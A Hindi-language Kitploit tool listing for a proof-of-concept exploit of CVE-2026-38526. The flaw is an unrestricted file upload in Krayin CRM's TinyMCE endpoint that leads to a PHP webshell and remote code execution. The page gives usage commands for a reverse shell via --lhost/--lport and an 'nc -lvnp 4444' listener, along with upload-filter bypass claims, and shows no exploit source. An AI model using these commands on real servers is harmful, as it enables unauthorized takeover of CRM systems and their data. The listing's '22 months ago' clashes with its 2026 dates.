Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-38526-POC — CVE-2026-38526 का प्रूफ ऑफ कॉन्सेप्ट Krayin CRM v2.2.x और उससे निचले संस्करणों में। मनमाना फ़ाइल अपलोड जो रिमोट कोड एक्ज़ीक्यूशन तक ले जाता है। | Kitploit
उपकरण/GitHubGitHub/pawpic/cve-2026-38526-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

CVE-2026-38526 का प्रूफ ऑफ कॉन्सेप्ट Krayin CRM v2.2.x और उससे निचले संस्करणों में। मनमाना फ़ाइल अपलोड जो रिमोट कोड एक्ज़ीक्यूशन तक ले जाता है।

रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-38526 - Krayin CRM RCE शोषण

Krayin CRM (≤ 2.2.x) - असीमित फ़ाइल अपलोड जो रिमोट कोड निष्पादन की ओर ले जाता है।

यह PoC कमजोर TinyMCE अपलोड एंडपॉइंट (/admin/tinymce/upload) का शोषण करके एक PHP वेबशेल अपलोड करता है और सर्वर पर कमांड निष्पादन प्राप्त करता है।


विशेषताएँ

  • CSRF टोकन हैंडलिंग के साथ पूर्ण स्वचालित लॉगिन
  • डबल एक्सटेंशन का उपयोग करके अपलोड प्रतिबंधों को बायपास करता है
  • रिवर्स शेल और एकल कमांड निष्पादन का समर्थन करता है
  • विश्वसनीय Laravel CSRF टोकन रीफ्रेश
  • साफ और उपयोग में आसान

डाउनलोड करना

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

आवश्यकताएँ

root@kitploit:~
pip3 install requests beautifulsoup4

उपयोग

  1. रिवर्स शेल (डिफ़ॉल्ट और अनुशंसित)
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  --lhost YOUR_IP \
  --lport 4444
  1. एकल कमांड
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

विकल्प

Argumentविवरणआवश्यक
-u, --urlलक्ष्य आधार URLहाँ
-e, --emailलॉगिन ईमेलहाँ
-p, --passwordलॉगिन पासवर्डहाँ
-c, --cmdएकल कमांड निष्पादित करेंनहीं
--lhostरिवर्स शेल के लिए आपका IPहाँ (यदि --cmd का उपयोग नहीं कर रहे हैं)
--lportलिसनिंग पोर्टनहीं (डिफ़ॉल्ट: 4444)

उदाहरण कार्यप्रवाह

लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 4444

शोषण चलाएँ:

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

अस्वीकरण

यह शोषण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है, अवैध है।

प्रभावित संस्करण

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526


लेखक: pawpic दिनांक: 2026

टूल डाउनलोड करें